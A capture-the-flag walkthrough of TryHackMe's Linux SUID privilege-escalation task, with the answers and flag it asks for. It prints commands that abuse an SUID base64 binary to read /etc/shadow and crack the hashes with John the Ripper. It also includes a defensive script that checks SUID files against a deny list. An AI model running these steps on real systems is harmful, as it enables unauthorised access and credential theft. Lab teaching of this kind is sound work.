This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task, so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation SUID Solution
Which user shares the name of a great comic book writer?
- Execute
cat /etc/passwd
Answer: gerryconway
What is the password of user2?
Type
find / -type f -perm -04000 -ls 2>/dev/null
to list files that have SUID or SGID bits set. Go to https://gtfobins.github.io/#+suid to get a list of applications exploitable when the SUID bit is set.
We can see that base64 is exploitable and that we can escalate privileges using SUID.
Using the guide that GTFOBins gave us, we execute the following:
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
Create the local files passwd.txt and shadow.txt and copy the content from the target machine. Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run John the Ripper on passwords.txt:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Answer: Password1
What is the content of the flag3.txt file?
Let's first check the home directory for the flag3.txt file. Let's run the command provided by GTFOBins again.
LFILE=/home/ubuntu/flag3.txt
base64 "$LFILE" | base64 --decode
Answer: THM-3847834
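Seen from the defender's side, both answers above depend on one misconfiguration: base64 carrying the SUID bit. The audit script below is an added example, not part of the original walkthrough; the function name audit_suid and every deny-list entry other than base64 are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: audit a directory tree for SUID files whose name is on a
# deny list of tools that can read arbitrary files or spawn a shell.

# Constructed deny list. base64 comes from the article; the other names are
# illustrative assumptions. Build the real list from your own baseline.
SUID_DENYLIST="base64 find vim nano cp"

# audit_suid ROOT
# Prints one line per SUID regular file under ROOT:
#   FLAG <path>   basename is on the deny list
#   OK   <path>   SUID, not on the list (still compare against a baseline)
# Returns 1 if anything was flagged, 0 otherwise.
audit_suid() {
    root=${1:-/}
    flagged=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue          # no SUID files found at all
        name=${path##*/}                    # basename without forking
        case " $SUID_DENYLIST " in
            *" $name "*) printf 'FLAG %s\n' "$path"; flagged=1 ;;
            *)           printf 'OK   %s\n' "$path" ;;
        esac
    done <<EOF
$(find "$root" -xdev -type f -perm -4000 2>/dev/null | sort)
EOF
    # Note: -perm -4000 matches the setuid bit only. With GNU find,
    # -perm /6000 matches files that have setuid or setgid set.
    return "$flagged"
}
```

Run `audit_suid /` as root on a host you administer; a flagged binary that has no reason to be SUID is fixed with `chmod u-s <path>`.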
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)